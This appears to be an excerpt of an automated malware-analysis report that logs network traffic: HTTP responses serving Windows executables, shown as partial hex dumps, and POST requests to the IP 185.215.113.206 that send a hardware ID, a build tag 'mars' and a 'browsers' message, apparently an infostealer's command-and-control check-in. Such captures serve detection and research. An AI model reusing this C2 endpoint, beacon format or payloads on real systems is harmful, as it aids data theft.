40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 62 64 75 62 63 64 78 00 e0 29 00 00 b0 06 00 00 d8 29 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6a 73 71 6d 76 6c 75 00 10 00 00 00 90 30 00 00 04 00 00 00 6c 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 30 00 00 22 00 00 00 70 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 11 Nov 2024 15:37:09 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 11 Nov 2024 14:06:28 GMTETag: "10bc000-626a39b5eb7ef"Accept-Ranges: bytesContent-Length: 17547264Content-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 00 fd 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 d6 a5 00 00 e6 65 00 00 00 00 00 10 e4 a5 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 30 0e 01 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 b0 b6 00 9c 00 00 00 00 b0 b5 00 b6 53 00 00 00 80 c8 00 00 ac 45 00 00 10 c0 00 38 65 08 00 00 00 00 00 00 00 00 00 00 e0 b6 00 f8 2d 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 b6 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 c5 b5 00 d0 13 00 00 00 10 b6 00 0c 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 d4 a5 00 00 10 00 00 00 d6 a5 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d8 bb 0d 00 00 f0 a5 00 00 bc 0d 00 00 da a5 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e4 f5 01 00 00 b0 b3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 b6 53 00 00 00 b0 b5 00 00 54 00 00 00 96 b3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 0c 91 00 00 00 10 b6 00 00 92 00 00 00 ea b3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9c 00 00 00 00 b0 b6 00 00 02 00 00 00 7c b4 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 f0 01 00 00 00 c0 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 d0 b6 00 00 02 00 00 00 7e b4 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f8 2d 09 00 00 e0 b6 00 00 2e 09 00 00 80 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 38 65 08 00 00 10 c0 00 00 66 08 00 00 ae bd 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 15:37:14 GMTContent-Type: application/octet-streamContent-Length: 3186688Last-Modified: Mon, 11 Nov 2024 15:16:00 GMTConnection: keep-aliveETag: "67321fb0-30a000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 89 1c 32 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b6 2a 00 00 60 01 00 00 00 00 00 50 3d 29 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 06 00 00 00 00 00 00 03 00 40 c3 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 97 2b 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 2c 00 0c 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 53 2b 00 18 00 00 00 40 e9 2a 00 c0 00 00 00 00 00 00 00 00 00 00 00 20 99 2b 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca b4 2a 00 00 10 00 00 00 b6 2a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc de 00 00 00 d0 2a 00 00 e0 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 4f 00 00 00 b0 2b 00 00 26 00 00 00 9c 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 08 00 00 00 00 00 2c 00 00 02 00 00 00 c2 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 10 2c 00 00 02 00 00 00 c4 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 55 00 00 00 20 2c 00 00 56 00 00 00 c6 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 54 4f 4e 00 00 00 00 00 84 04 00 00 80 2c 00 00 84 04 00 00 1c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 15:37:19 GMTContent-Type: application/octet-streamContent-Length: 3135488Last-Modified: Mon, 11 Nov 2024 15:33:56 GMTConnection: keep-aliveETag: "673223e4-2fd800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 e0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 30 00 00 04 00 00 72 f6 2f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 80 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 90 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 94 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 74 77 75 77 79 7a 66 00 20 2a 00 00 b0 05 00 00 1a 2a 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 68 66 74 74 73 76 7a 00 10 00 00 00 d0 2f 00 00 06 00 00 00 b0 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 2f 00 00 22 00 00 00 b6 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 15:37:24 GMTContent-Type: application/octet-streamContent-Length: 1802752Last-Modified: Mon, 11 Nov 2024 15:34:09 GMTConnection: keep-aliveETag: "673223f1-1b8200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 f5 ad 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 63 75 79 78 78 6a 75 00 f0 19 00 00 40 4f 00 00 e6 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 75 73 6e 6c 72 76 6c 00 10 00 00 00 30 69 00 00 04 00 00 00 5c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 69 00 00 22 00 00 00 60 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 15:37:32 GMTContent-Type: application/octet-streamContent-Length: 2823680Last-Modified: Mon, 11 Nov 2024 15:20:57 GMTConnection: keep-aliveETag: "673220d9-2b1600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 80 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 2b 00 00 04 00 00 08 22 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 76 77 7a 77 64 65 67 00 c0 2a 00 00 a0 00 00 00 b6 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 6b 65 65 61 71 78 70 00 20 00 00 00 60 2b 00 00 04 00 00 00 f0 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 80 2b 00 00 22 00 00 00 f4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 11 Nov 2024 15:37:39 GMTContent-Type: application/octet-streamContent-Length: 1802752Last-Modified: Mon, 11 Nov 2024 15:34:09 GMTConnection: keep-aliveETag: "673223f1-1b8200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 40 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 69 00 00 04 00 00 f5 ad 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 63 75 79 78 78 6a 75 00 f0 19 00 00 40 4f 00 00 e6 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 75 73 6e 6c 72 76 6c 00 10 00 00 00 30 69 00 00 04 00 00 00 5c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 69 00 00 22 00 00 00 60 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCGHCBKFCFBFHIDHDBFHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 32 41 44 43 42 33 46 46 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 2d 2d 0d 0a Data Ascii: ------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="hwid"F72ADCB3FF603810289448------EGCGHCBKFCFBFHIDHDBFContent-Disposition: form-data; name="build"mars------EGCGHCBKFCFBFHIDHDBF--
                    Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 34 31 63 65 33 30 33 38 39 30 36 61 36 63 35 65 39 63 33 34 64 37 39 64 31 32 64 65 32 34 63 66 64 32 63 65 35 63 30 63 62 62 65 63 34 63 32 63 65 31 64 63 36 61 63 62 63 32 66 34 64 64 35 31 37 66 34 63 34 39 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="token"041ce3038906a6c5e9c34d79d12de24cfd2ce5c0cbbec4c2ce1dc6acbc2f4dd517f4c495------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="message"browsers------JJEGIJEGDBFHDGCAFCAE--
